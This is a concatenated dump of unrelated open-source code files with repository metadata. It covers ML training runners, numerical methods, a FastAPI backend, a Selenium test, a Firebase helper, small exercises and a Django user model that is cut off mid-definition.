data_batch, train_mode=True, **kwargs)\n\n if not isinstance(outputs, dict):\n raise TypeError('\"batch_processor()\" or \"model.train_step()\"'\n ' must return a dict')\n if 'log_vars' in outputs:\n self.log_buffer.update(outputs['log_vars'],\n outputs['num_samples'])\n self.outputs = outputs\n self.call_hook('after_train_iter')\n self._iter += 1\n\n self.call_hook('after_train_epoch')\n self._epoch += 1\n \n 
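# the validation pass below runs under no_grad, so autograd keeps no gradient buffers for it\n    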
@torch.no_grad()\n def val(self, data_loader, **kwargs):\n self.model.eval()\n self.mode = 'val'\n self.data_loader = data_loader\n self.call_hook('before_val_epoch')\n time.sleep(2) # Prevent possible deadlock during epoch transition\n for i, data_batch in enumerate(self.data_loader):\n self._inner_iter = i\n self.call_hook('before_val_iter')\n self.run_iter(data_batch, train_mode=False)\n self.call_hook('after_val_iter')\n\n self.call_hook('after_val_epoch')\n\n def run(self, data_loaders, workflow, max_epochs=None, **kwargs):\n \"\"\"Start running.\n\n Args:\n data_loaders (list[:obj:`DataLoader`]): Dataloaders for training\n and validation.\n workflow (list[tuple]): A list of (phase, epochs) to specify the\n running order and epochs. E.g, [('train', 2), ('val', 1)] means\n running 2 epochs for training and 1 epoch for validation,\n iteratively.\n \"\"\"\n assert isinstance(data_loaders, list)\n assert mmcv.is_list_of(workflow, tuple)\n assert len(data_loaders) == len(workflow)\n if max_epochs is not None:\n warnings.warn(\n 'setting max_epochs in run is deprecated, '\n 'please set max_epochs in runner_config', DeprecationWarning)\n self._max_epochs = max_epochs\n\n assert self._max_epochs is not None, (\n 'max_epochs must be specified during instantiation')\n\n for i, flow in enumerate(workflow):\n mode, epochs = flow\n if mode == 'train':\n self._max_iters = self._max_epochs * len(data_loaders[i])\n break\n\n work_dir = self.work_dir if self.work_dir is not None else 'NONE'\n self.logger.info('Start running, host: %s, work_dir: %s',\n get_host_info(), work_dir)\n self.logger.info('workflow: %s, max: %d epochs', workflow,\n self._max_epochs)\n self.call_hook('before_run')\n\n while self.epoch < self._max_epochs:\n for i, flow in enumerate(workflow):\n mode, epochs = flow\n # import ipdb; ipdb.set_trace()\n if isinstance(mode, str): # self.train()\n if not hasattr(self, mode):\n raise ValueError(\n f'runner has no method named \"{mode}\" to run an '\n 'epoch')\n epoch_runner = getattr(self, mode)\n else:\n raise TypeError(\n 'mode in workflow must be a str, but got {}'.format(\n type(mode)))\n\n for _ in range(epochs):\n if mode == 'train' and self.epoch >= self._max_epochs:\n break\n epoch_runner(data_loaders[i], **kwargs)\n\n time.sleep(1) # wait for some hooks like loggers to finish\n self.call_hook('after_run')\n\n def save_checkpoint(self,\n out_dir,\n filename_tmpl='epoch_{}.pth',\n save_optimizer=True,\n meta=None,\n create_symlink=True):\n \"\"\"Save the checkpoint.\n\n Args:\n out_dir (str): The directory that checkpoints are saved.\n filename_tmpl (str, optional): The checkpoint filename template,\n which contains a placeholder for the epoch number.\n Defaults to 'epoch_{}.pth'.\n save_optimizer (bool, optional): Whether to save the optimizer to\n the checkpoint. Defaults to True.\n meta (dict, optional): The meta information to be saved in the\n checkpoint. 
Defaults to None.\n create_symlink (bool, optional): Whether to create a symlink\n \"latest.pth\" to point to the latest checkpoint.\n Defaults to True.\n \"\"\"\n if meta is None:\n meta = dict(epoch=self.epoch + 1, iter=self.iter)\n elif isinstance(meta, dict):\n meta.update(epoch=self.epoch + 1, iter=self.iter)\n else:\n raise TypeError(\n f'meta should be a dict or None, but got {type(meta)}')\n if self.meta is not None:\n meta.update(self.meta)\n\n filename = filename_tmpl.format(self.epoch + 1)\n filepath = osp.join(out_dir, filename)\n optimizer = self.optimizer if save_optimizer else None\n save_checkpoint(self.model, filepath, optimizer=optimizer, meta=meta)\n # in some environments, `os.symlink` is not supported, you may need to\n # set `create_symlink` to False\n if create_symlink:\n dst_file = osp.join(out_dir, 'latest.pth')\n if platform.system() != 'Windows':\n mmcv.symlink(filename, dst_file)\n else:\n shutil.copy(filepath, dst_file)\n\n@RUNNERS.register_module()\nclass RunnerFeatClsLoc(EpochBasedRunnerFeatClsLoc):\n \"\"\"Deprecated name of EpochBasedRunner.\"\"\"\n\n def __init__(self, *args, **kwargs):\n warnings.warn(\n 'Runner was deprecated, please use EpochBasedRunner instead')\n super().__init__(*args, **kwargs)\n# ","repo_name":"NVlabs/DICOD","sub_path":"mmcv_dev/runner/epoch_based_runner_feat_cls_loc.py","file_name":"epoch_based_runner_feat_cls_loc.py","file_ext":"py","file_size_in_byte":10623,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"43"} +{"seq_id":"13517697486","text":"def jacobi(first_eq, second_eq, third_eq, n=100):\r\n \"\"\"\r\n Iterative method for solving linear equations\r\n https://en.wikipedia.org/wiki/Jacobi_method\r\n \"\"\"\r\n\r\n a11 = first_eq[0]\r\n a12 = first_eq[1]\r\n a13 = first_eq[2]\r\n b1 = first_eq[3]\r\n a21 = second_eq[0]\r\n a22 = second_eq[1]\r\n a23 = second_eq[2]\r\n b2 = second_eq[3]\r\n a31 = third_eq[0]\r\n a32 = third_eq[1]\r\n a33 = third_eq[2]\r\n b3 = third_eq[3]\r\n\r\n # Initial values\r\n x= 0\r\n y = 0\r\n z = 0\r\n xs = []\r\n ys = []\r\n zs = []\r\n ns = []\r\n\r\n for i in range(n):\r\n oldx = x\r\n oldy = y\r\n oldz = z\r\n x = (1/a11) * (b1 - a12*oldy - a13*oldz)\r\n y = (1/a22) * (b2 - a21*oldx - a23*oldz)\r\n z = (1/a33) * (b3 - a31*oldx - a32*oldy)\r\n xs.append(x)\r\n ys.append(y)\r\n zs.append(z)\r\n ns.append(i)\r\n\r\n return {'n': ns, 'x': xs, 'y': ys, 'z': zs}\r\n","repo_name":"adhamsalama/iterative_methods","sub_path":"jacobi.py","file_name":"jacobi.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2474131135","text":"#import lazynlp\nimport analytics\nfrom create import filter_files\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"path\", help=\"path containing links\")\nparser.add_argument(\"--recursive\", help=\"indicates that path contains folders instead of files\", action=\"store_true\")\nparser.add_argument(\"--delete\", help=\"delete duplicate files\", action=\"store_true\")\nargs = parser.parse_args()\n\nif args.recursive:\n\tpath = os.path.abspath(args.path)\n\tpaths = [ os.path.join(path,name) for name in os.listdir(path) if os.path.isdir(os.path.join(path, name)) ]\n\tprint( \"paths found: \" + str(len(paths)) )\nelse:\n\tpaths = [os.path.abspath(args.path)]\n\nfiles = []\n\nfor dir in paths:\n\tfile_list = os.listdir(dir)\n\tprint (f'Files in {dir}: {len(file_list)}')\n\tif len(file_list) == 
0:\n\t\tcontinue\n\tfor file in file_list:\n\t\tfiles.append(os.path.join(dir,file))\n\nprint ( 'files found: ' + str(len(files)) )\t\n\nfilter_files(files, threshold=0.5, gran='word', n=8, capacity=100000000, error_rate=1e-7, header=0, interval=1000000)\n\nif args.delete:\n\tdups = open('dupped_files.txt','r')\n\tcount = 0\n\tfor file in dups:\n\t\tos.remove(file.strip())\n\t\tcount += 1\n\tprint (f'Removed {count} duplicate files.')\n","repo_name":"cweyandt/MIDS_w251_lazynlp_threaded","sub_path":"remove_dups.py","file_name":"remove_dups.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"24793209201","text":"from fastapi import HTTPException\nfrom database import *\nimport secrets\nfrom models.client_credential import Client_credential\nfrom models.company import Company\nfrom models.company_account import Company_account\nfrom models.role import Role\n\ndef create_company(companies, current_user):\n    if current_user.roleId != 1:\n        raise HTTPException(status_code=403, detail=\"Cannot create company\")\n\n    result = Company.insert_many(companies).execute()\n    for company in companies:\n        app_id = secrets.token_hex(16)\n        app_key = secrets.token_urlsafe(16)\n        Client_credential.insert(app_key=app_key, app_id=app_id).execute()\n        current_company = Company.get_or_none(Company.uuid == company['uuid'])\n        Company_account.insert(\n            companyId=current_company.id, appId=app_id).execute()\n        print(app_id, app_key, current_company.id)\n\n\n    return result\n\n\ndef get_companies(current_user):\n\n    data = {}\n    companies = []\n    roles_result = []\n\n\n\n    if current_user.roleId == 1:\n        companies_result = list(Company.select())\n        roles_result = list(Role.select())\n        companies = companies_result\n        data = {\n            \"companies\": companies_result,\n            \"roles\": roles_result\n        }\n    else:\n        company_accounts = list(\n            Company_account\n            .select(Company_account.companyId.alias('id'))\n            .where(current_user.id == Company_account.userId)\n        )\n\n        for company_account in company_accounts:\n            result = list(\n                Company\n                .select()\n                .where(Company.id == company_account.id)\n            )\n            roles_result = list(Role\n                                .select()\n                                .where(current_user.roleId <= Role.id))\n\n            companies.append(result[0])\n\n        data = {\n            \"companies\": companies,\n            \"roles\": roles_result\n        }\n\n\n    return data\n","repo_name":"franlopz/backoffice-backend","sub_path":"crud/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"13412956953","text":"# [20301] Reverse Josephus\n\"\"\"\n[1,2,3,4,5,6,7] \nK = erase every 3rd one\nappend 1 and 2 behind 7, popleft the 3 now at the front and print it\n\nonce the number of removals reaches M, switch direction\n\"\"\"\nfrom collections import deque\n\nN, K, M = map(int, input().split()) # 7 3 4\n\"\"\"\nN people sit in a circle\nremove every K-th person\nafter every M removals, reverse the removal direction\n\"\"\"\n\npeople = deque(range(1, N+1)) # put the numbers 1 through N into a deque\ndirection = 1 # start out moving in the right-hand direction\ncount = 0 # number of people removed\n\nwhile people:\n    if direction == 1: # moving to the right\n        for _ in range(K-1):\n            people.append(people.popleft()) # find the K-th person\n        print(people.popleft()) # remove the K-th person and print their number\n    else: # moving to the left\n        for _ in range(K-1):\n            people.appendleft(people.pop()) # find the K-th person\n        print(people.pop()) # remove the K-th person and print their number\n\n    count += 1\n    if count % M == 0: # once M people have been removed\n        direction *= -1 # reverse the direction\n","repo_name":"SeungAh-Hong/algorithm-study-hyundai","sub_path":"Baekjoon/초급자_큐/반전요세푸스_박혜원.py","file_name":"반전요세푸스_박혜원.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"43"}
{"seq_id":"70387530050","text":"import numpy as np\nfrom scipy.io import wavfile\nimport matplotlib.pyplot as plt\nimport os\nfrom WavFormatTansform import wav_f32_to_int16\nimport MyPack as mp\n\n\nroot = 'audio_files'\nname_in = 'Bass.wav'\nname_out = 'Bass2.wav'\ndir_input = os.path.join(root, name_in)\ndir_output = os.path.join(root, name_out)\n\nwav_f32_to_int16(dir_input, dir_output)\nsampling_rate, data = wavfile.read(dir_output)\n\nif len(data.shape) == 1:\n    channel = 1\n    data = data.reshape(-1, 1)\nelse:\n    channel = data.shape[1]\nlength = data.shape[0] / sampling_rate\nprint('sampling_rate is:', sampling_rate)\nprint('number of channels:', channel)\nprint('Length of the file:', length)\ntime = np.linspace(0, length, data.shape[0])\n\nframes = mp.signal_framing(data, sampling_rate)\n\nmp.energy_analysis(frames)\nplt.show()\n\n'''mp.show_fft(data[:, 1], sampling_rate, min_hz=0, max_hz=22050)\nmp.show_fft(frames[0, :, 1], sampling_rate, min_hz=0, max_hz=22050)\nmp.show_fft(frames[1, :, 1], sampling_rate, min_hz=0, max_hz=22050)\nmp.show_fft(frames[2, :, 1], sampling_rate, min_hz=0, max_hz=22050)\nmp.show_fft(frames[3, :, 1], sampling_rate, min_hz=0, max_hz=22050)'''\n\n\n\n\n\n'''N = np.int(sampling_rate/100)\nmask = list(np.arange(N))\ntest_data = data[:, 0]\ntest_data = test_data[mask]\nmp.show_fft(test_data, sampling_rate, min_hz=0, max_hz=22050)\n\n\nw = mp.window('Hamming', N)\nresult = test_data * w\nmp.show_fft(result, sampling_rate, min_hz=0, max_hz=22050)\n\nplt.show()'''\n\n\n\n\n","repo_name":"MrRhine98/Audio_processing_notes","sub_path":"AudioLoader.py","file_name":"AudioLoader.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"39755637494","text":"\"\"\" User Login Test\n\nUser login tests\n\"\"\"\n\n__author__ = 'Richard'\n__version__ = '2021-07-10'\n\nimport allure\nimport pytest\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium import webdriver\nfrom time import sleep\n\nfrom pages.user_login_page import UserLoginPage\n\n\nclass TestUserLogin(object):\n    login_data = [\n        ('mail@lichao.xin', '123456', '首页')\n    ]\n\n    def setup_class(self):\n        options = webdriver.ChromeOptions()\n        # ignore https security interception\n        options.add_argument('--ignore-certificate-errors')\n\n        # headless mode\n        # options.add_argument('--headless')\n        # options.add_argument('--disable-gpu')\n\n        # initialize the webdriver\n        self.driver = webdriver.Chrome(options=options)\n\n        self.loginPage = UserLoginPage(self.driver)\n        self.loginPage.goto_login_page()\n\n    def teardown_class(self):\n        self.driver.quit()\n\n    # test user login\n    @allure.title(\"Test user login, test data: {username},{pwd},{expected}\")\n    @pytest.mark.parametrize('username, pwd, expected', login_data)\n    def test_user_login(self, username, pwd, expected):\n\n        # enter the username\n        self.loginPage.input_username(username)\n        # enter the password\n        self.loginPage.input_pwd(pwd)\n        # click the login button\n        self.loginPage.click_login_btn()\n\n        sleep(3)\n        # verify\n        if username != '':\n            # wait for the page title\n            WebDriverWait(self.driver, 5).until(EC.title_is(expected))\n\n            # negated variant\n            # WebDriverWait(self.driver, 5).until_not(EC.title_is(expected))\n\n            sleep(3)\n            # verify\n            assert self.driver.title == expected\n        else:\n            # wait for the alert box\n            
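# alert_is_present() polls until the JavaScript alert has opened, so the switch_to.alert call that follows cannot race it\n            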
WebDriverWait(self.driver, 5).until(EC.alert_is_present())\n            alert = self.driver.switch_to.alert\n            assert alert.text == expected\n            alert.accept()\n\n\nif __name__ == '__main__':\n    pytest.main(['-sv', 'test_user_login.py'])\n","repo_name":"xinlc/auto-test-template","sub_path":"tests/test_user_login.py","file_name":"test_user_login.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"}
{"seq_id":"73508816449","text":"import tensorflow as tf, sys\n\nimage_path = sys.argv[1]\n\n# setup\nlabel_file = 'retrained_labels.txt'\ngraph_file = 'retrained_graph.pb'\n\n# Read in image\nimage_data = tf.gfile.FastGFile(image_path, 'rb').read()\n\nlabel_lines = [line.rstrip() for line in tf.gfile.GFile(label_file)]\n\n# open retrained graph file and parse the model\nwith tf.gfile.FastGFile(graph_file, 'rb') as f:\n\tgraph_def = tf.GraphDef()\n\tgraph_def.ParseFromString(f.read())\n\t_ = tf.import_graph_def(graph_def, name='')\n\n# start a tensorflow session\nwith tf.Session() as sess:\n\n\t# Feed the image data in and get a prediction: the softmax tensor\n\t# maps the final layer into probabilities for each classifier label\n\tsoftmax = sess.graph.get_tensor_by_name('final_result:0')\n\n\t# executing softmax tensor function on input image\n\tpredictions = sess.run(softmax, {'DecodeJpeg/contents:0': image_data})\n\n\t# grab labels in order of confidence; argsort is ascending, so reverse it to put the best match first\n\tin_order = predictions[0].argsort()[-len(predictions[0]):][::-1]\n\tmatch_label = label_lines[in_order[0]]\n\tmatch_score = predictions[0][in_order[0]] * 100\n\tprint ('-----------------------------------------------------')\n\tprint('Welcome stranger...\\n')\n\tprint('Seems like you most resemble {0} from the fellowship.\\n'.format(match_label))\n\tprint(\"Let me see... I predict you're {0} with a {1}% chance!\".format(match_label, round(match_score, 3)))\n\tprint ('-------------------Other Members---------------------')\n\tprint ('details:')\n\tfor node_id in in_order[1:]:\n\t\tclassifier = label_lines[node_id]\n\t\tscore = predictions[0][node_id]\n\t\tprint('%s (score = %.5f)' % (classifier, score))","repo_name":"elllot/HobbitClassifier","sub_path":"image_classifier.py","file_name":"image_classifier.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"5631849624","text":"\"\"\"\n2019.11.09 15:00 - 15:09\nSum of even numbers\n\"\"\"\n\nresult = 0\nindex = 1\n\nwhile index <= 100:\n    if index % 2 == 0:\n        print(index)\n        result += index\n    index += 1\n\nprint(\"even sum = %d\" % result)\n","repo_name":"sstian/PythonScripts","sub_path":"Study/even_sum.py","file_name":"even_sum.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"35886059043","text":"# 24.py\n\nnum_lines = 100\n\nfile = open('example_file_3', 'wb')\nfor i in range(num_lines):\n    # To the bytes function we should pass an iterable with the content to\n    # convert. 
For this reason we pass the integer inside the list\n content = b\"line_\" + bytes([i]) + b\" abcde12\"\n file.write(content)\nfile.close()\n\nfile = open('example_file_3', 'rb')\n# The number 40 indicates the number of bytes that will be read from the file\nprint(file.read(40))\nfile.close()\n","repo_name":"advancedpythonprogramming/chapter_codes","sub_path":"codes_ch10/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"43"} +{"seq_id":"8149401756","text":"from firebase import firebase\nimport datetime\n\nfirebase = firebase.FirebaseApplication('https://ta-kotlin.firebaseio.com/', None)\n\ndef baca_status():\n result = firebase.get('/device_info', None)\n print(result[\"status_pintu\"])\n return result[\"status_pintu\"]\n\ndef baca_register():\n result = firebase.get('/device_info', None)\n print(result[\"status_register\"])\n return [result[\"status_register\"], result[\"pemilik\"]]\ndef pemilik():\n result = firebase.get('/device_info', None)\n print(result[\"pemilik\"])\n return result[\"pemilik\"]\n\ndef ubah_status(status):\n result = firebase.put('/device_info', name=\"status_pintu\", data=status, params={'print': 'pretty'})\n tanggal = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\n result = firebase.put('/device_info', name=\"terakhir_dibuka\", data=tanggal, params={'print': 'pretty'})\n print(result)\n\ndef ubah_status_mode():\n result = firebase.put('/device_info', name=\"status_register\", data=0, params={'print': 'pretty'})\n # result = firebase.put('/device_info', name=\"pemilik\", data=\"\", params={'print': 'pretty'})\n print(result)\n\ndef history():\n tanggal = datetime.datetime.now().strftime(\"%B %d,%Y %I:%M%p \")\n data = {\n \"status\": \"sistem\",\n \"username\": \"sistem\",\n \"tanggaldanwaktu\": tanggal\n }\n result = firebase.post('/History', data)\n #result = firebase.post('/History', name=\"username\",data=\"\", params={'print': 'pretty'})\n print(result)\n\n\nif __name__ == \"__main__\":\n try:\n ubah_status(2)\n while True:\n pemilik()\n except KeyboardInterrupt:\n print(\"[INFO] CLOSED CONNECTION\")\n","repo_name":"riskysetiadis/Smart-Safe-Box","sub_path":"modules/firebase_app.py","file_name":"firebase_app.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1501403041","text":"import os\nimport shutil\nimport datetime\nimport torch\nfrom base.losses.translation_loss import TranslationLoss\nfrom base.metrics.bleu import calc_bleu\nfrom base.schedulers.trans_lr_scheduler import TransLRScheduler\nfrom transformer.model import Transformer\nfrom datasets.wrapper import TextDataWrapper\nfrom utils import load_config\nfrom base.trainer import Trainer\nfrom constants import *\nimport argparse\n\nif __name__ == \"__main__\":\n \"\"\"\n Usage\n python train.py \\\n --config_path ./configs/_base_.yaml \\\n --train_src_path ./data/train.en \\\n --train_trg_path ./data/train.vi \\\n --valid_src_path ./data/val.en \\\n --valid_trg_path ./data/val.vi \\\n --device cuda:0\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config_path\", type=str, default=\"./configs/_base_.yaml\")\n parser.add_argument(\"--train_src_path\", type=str, default=\"./data/train.en\")\n parser.add_argument(\"--train_trg_path\", type=str, default=\"./data/train.vi\")\n parser.add_argument(\"--valid_src_path\", type=str, default=\"./data/val.en\")\n 
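# the data-path defaults above and below mirror the usage example in the module docstring\n    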
parser.add_argument(\"--valid_trg_path\", type=str, default=\"./data/val.vi\")\n parser.add_argument(\"--load_from\", type=str, default=None, help=\"path to checkpoint to be loaded\")\n parser.add_argument(\"--out_dir\", type=str, default=\"./runs\", help=\"directory to save checkpoints\")\n parser.add_argument(\"--device\", type=str, default=\"cuda\")\n\n args = parser.parse_args()\n\n try: \n if args.out_dir == './runs':\n now = datetime.datetime.now()\n c = now.strftime(\"%Y-%m-%d_%H-%M-%S\")\n args.out_dir = os.path.join(args.out_dir, c)\n \n # copy config to out_dir\n os.makedirs(args.out_dir, exist_ok=True)\n shutil.copy(args.config_path, os.path.join(args.out_dir, 'config.yaml'))\n\n # Load config\n config_dict = load_config(args.config_path)\n print('Config:', config_dict)\n\n # Load dataset\n data_wrapper = TextDataWrapper(src_lang=\"en_core_web_sm\", \n trg_lang=\"vi_core_news_lg\", \n max_len=config_dict['DATA']['MAX_LEN'], \n batch_size=config_dict['DATA']['BATCH_SIZE'],\n device=args.device)\n train_dataloader = data_wrapper.create_dataloader(args.train_src_path, args.train_trg_path, is_train=True, save_field_path=args.out_dir)\n valid_dataloader = data_wrapper.create_dataloader(args.valid_src_path, args.valid_trg_path, is_train=False)\n src_vocab_size = len(data_wrapper.src_field.vocab)\n trg_vocab_size = len(data_wrapper.trg_field.vocab)\n\n # Create model\n model = Transformer(config_path=args.config_path,\n src_vocab_size=src_vocab_size,\n trg_vocab_size=trg_vocab_size)\n if args.load_from is not None:\n model.load_state_dict(torch.load(args.load_from))\n\n # Optimizer and Loss function\n optimizer = TransLRScheduler(\n torch.optim.Adam(model.parameters(), betas=(0.9, 0.98), eps=1e-9),\n init_lr=config_dict['OPTIM']['INIT_LR'],\n d_model=config_dict['MODEL']['ENCODER']['D_MODEL'],\n n_warmup_steps=config_dict['OPTIM']['N_WARMUP_STEPS'],\n )\n criterion = TranslationLoss(\n classes=trg_vocab_size,\n padding_idx=data_wrapper.trg_field.vocab.stoi[PAD],\n smoothing=0.1,\n )\n\n # Run\n trainer = Trainer(\n model=model,\n optimizer=optimizer, \n criterion=criterion,\n num_epochs=config_dict['TRAINER']['N_EPOCHS'],\n metric=calc_bleu,\n src_field=data_wrapper.src_field,\n trg_field=data_wrapper.trg_field,\n max_len=config_dict['DATA']['MAX_LEN'],\n device=args.device,\n )\n\n start = datetime.datetime.now()\n trainer.fit(train_dataloader, valid_dataloader, out_dir=args.out_dir)\n end = datetime.datetime.now()\n print('Training time:', end - start)\n\n except Exception as e:\n raise e","repo_name":"htrvu/Transformer-MT","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"43"} +{"seq_id":"12005842161","text":"class Solution:\n \n \"\"\"\n Problem: https://leetcode.com/contest/weekly-contest-313/problems/maximum-sum-of-an-hourglass/\n Comments:\n - The idea is that you want to perserve information going from one cell to the next\n - Brute force looks like it will pass (150^2 * 7)\n \"\"\"\n \n def maxSum(self, grid: List[List[int]]) -> int:\n n = len(grid)\n m = len(grid[0])\n \n \n mv = 0\n for i in range(1,n-1):\n for j in range(1,m-1):\n total = grid[i][j]\n for k in range(-1,2):\n total += grid[i-1][j-k] + grid[i+1][j+k]\n \n # print(total)\n if total > mv:\n mv = total\n \n return 
+{"seq_id":"12005842161","text":"from typing import List\n\n\nclass Solution:\n    \n    \"\"\"\n    Problem: https://leetcode.com/contest/weekly-contest-313/problems/maximum-sum-of-an-hourglass/\n    Comments:\n        - The idea is that you want to preserve information going from one cell to the next\n        - Brute force looks like it will pass (150^2 * 7)\n    \"\"\"\n    \n    def maxSum(self, grid: List[List[int]]) -> int:\n        n = len(grid)\n        m = len(grid[0])\n        \n        \n        mv = 0\n        for i in range(1,n-1):\n            for j in range(1,m-1):\n                total = grid[i][j]\n                for k in range(-1,2):\n                    total += grid[i-1][j-k] + grid[i+1][j+k]\n                \n                # print(total)\n                if total > mv:\n                    mv = total\n        \n        return mv","repo_name":"Saaapling/Code-Practice","sub_path":"Medium/Maximum_Sum_of_an_Hourglass/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"41350110744","text":"from unittest import TestCase\nimport warnings\nimport FastaDB\nimport tempfile\n# import hashlib\nimport filecmp\n\n__author__ = 'walzer'\n\n\nclass TestFastaDB(TestCase):\n    def test_readSeqs(self):\n        fdb = FastaDB.FastaDB()\n\n        # case empty\n        with warnings.catch_warnings(record=True) as w:\n            # all warnings to be triggered.\n            warnings.simplefilter(\"always\")\n            # trigger warning.\n            fdb.read_seqs('')\n            # tests\n            self.assertFalse(len(w) < 1, 'More warnings than expected')\n            self.assertTrue(issubclass(w[-1].category, UserWarning))\n            self.assertTrue(\"Could not read file\" in str(w[-1].message))\n            w.pop()\n\n        # case three.fasta\n        fdb = FastaDB.FastaDB()\n        fdb.read_seqs('three.fasta')\n        self.assertTrue(len(fdb.collection) == 3)\n        self.assertTrue(len(fdb.idx) == 3+1)\n        self.assertTrue(len(fdb.accs) == 3)\n        ts = 0\n        for i in fdb.collection.values():\n            ts += len(i)\n        ts += (len(fdb.collection) - 1)\n        self.assertTrue(len(fdb.searchstring) == ts)\n\n        # case addition of three.dat\n        fdb.read_seqs('three.dat')\n        self.assertTrue(len(fdb.collection) == 6)\n        self.assertTrue(len(fdb.idx) == 6+1)\n        self.assertTrue(len(fdb.accs) == 6)\n        ts = 0\n        for i in fdb.collection.values():\n            ts += len(i)\n        ts += (len(fdb.collection) - 1)\n        self.assertTrue(len(fdb.searchstring) == ts)\n\n    def test_writeSeqs(self):\n        fdb = FastaDB.FastaDB()\n        fdb.read_seqs('three.fasta')\n        with tempfile.NamedTemporaryFile() as temp:\n            fdb.write_seqs(temp.name)\n            # self.assertTrue(hashlib.sha256(open(temp.name, 'rb').read()).digest() == hashlib.sha256(open(\"three.fasta\", 'rb').read()).digest())\n            self.assertTrue(filecmp.cmp(temp.name, 'three.fasta'))\n\n\n    def test_exists(self):\n        fdb = FastaDB.FastaDB()\n        fdb.read_seqs('three.fasta')\n        exi = \"TERNEKKQQMGKEYREKIEAEL\"\n        ine = \"XXXNEKKQQMGKEYREKIEAEL\"\n        self.assertTrue(fdb.exists(exi))\n        self.assertFalse(fdb.exists(ine))\n\n    def test_search(self):\n        fdb = FastaDB.FastaDB()\n        fdb.read_seqs('three.fasta')\n        eal = \"ELD\"\n        self.assertDictEqual(fdb.search(eal), {'ELD': 'sp|P31946|1433B_HUMAN'})\n\n    def test_search_all(self):\n        fdb = FastaDB.FastaDB()\n        fdb.read_seqs('three.fasta')\n        eal = \"ELD\"\n        self.assertDictEqual(fdb.search_all(eal), {'ELD': 'sp|P31946|1433B_HUMAN,sp|Q04917|1433F_HUMAN,sp|P62258|1433E_HUMAN'})\n","repo_name":"mwalzer/pyBioConveniences","sub_path":"tests/test_fastaDB.py","file_name":"test_fastaDB.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25602299293","text":"from django.db import models\r\nfrom django.contrib.auth.models import BaseUserManager, AbstractBaseUser, PermissionsMixin\r\nfrom phonenumber_field.modelfields import PhoneNumberField\r\nfrom django_countries.fields import CountryField\r\nfrom django.db.models.signals import post_save\r\nfrom django.dispatch import receiver\r\nfrom django.core.validators import FileExtensionValidator\r\n\r\n\r\n# Create your models here.\r\n\r\nclass UserManager(BaseUserManager):\r\n    def create_user(self, email, full_name, password=None):\r\n\r\n        if not email:\r\n            raise ValueError('Email should not be empty')\r\n        if not full_name:\r\n            raise ValueError('Name should not be empty')\r\n        if not password:\r\n            raise ValueError('Password should 
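The hourglass scan in the `Solution.py` record above can be exercised without the contest harness; on the grid below (the public example for this problem) the best hourglass is 6+2+1 + 2 + 9+2+8 = 30:

```python
def max_hourglass_sum(grid):
    # Same brute force as above: each interior cell is an hourglass
    # center, flanked by the full rows directly above and below it.
    n, m = len(grid), len(grid[0])
    best = 0
    for i in range(1, n - 1):
        for j in range(1, m - 1):
            total = grid[i][j]
            for k in range(-1, 2):
                total += grid[i - 1][j - k] + grid[i + 1][j + k]
            best = max(best, total)
    return best

grid = [[6, 2, 1, 3],
        [4, 2, 1, 5],
        [9, 2, 8, 7],
        [4, 1, 2, 9]]
print(max_hourglass_sum(grid))  # 30
```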
not be empty')\r\n\r\n user = self.model(\r\n email=self.normalize_email(email=email),\r\n full_name=full_name\r\n )\r\n user.set_password(password)\r\n user.save(using=self._db)\r\n return user\r\n\r\n def create_superuser(self, email, full_name, password=None):\r\n user = self.create_user(\r\n email=email, full_name=full_name, password=password)\r\n user.is_superuser = True\r\n user.is_staff = True\r\n user.is_active = True\r\n user.save(using=self._db)\r\n return user\r\n\r\n\r\nclass User(AbstractBaseUser, PermissionsMixin):\r\n email = models.EmailField(\r\n max_length=100, verbose_name='Email', unique=True, blank=False)\r\n full_name = models.CharField(verbose_name='Full Name', max_length=100)\r\n phone_number = PhoneNumberField(verbose_name=\"Phone Number\")\r\n address_one = models.CharField(max_length=255, blank=True)\r\n address_two = models.CharField(max_length=255, blank=True)\r\n city = models.CharField(max_length=255, blank=True)\r\n zipcode = models.CharField(max_length=255, null=True, blank=True)\r\n country = models.CharField(\r\n verbose_name=\"Country\", max_length=50, blank=True)\r\n profile_pic = models.ImageField(\r\n upload_to='users/', default='users/default.jpg')\r\n birth_date = models.DateField(\r\n verbose_name='Birth Date', blank=True, null=True)\r\n date_joined = models.DateTimeField(\r\n verbose_name='Date Joined', 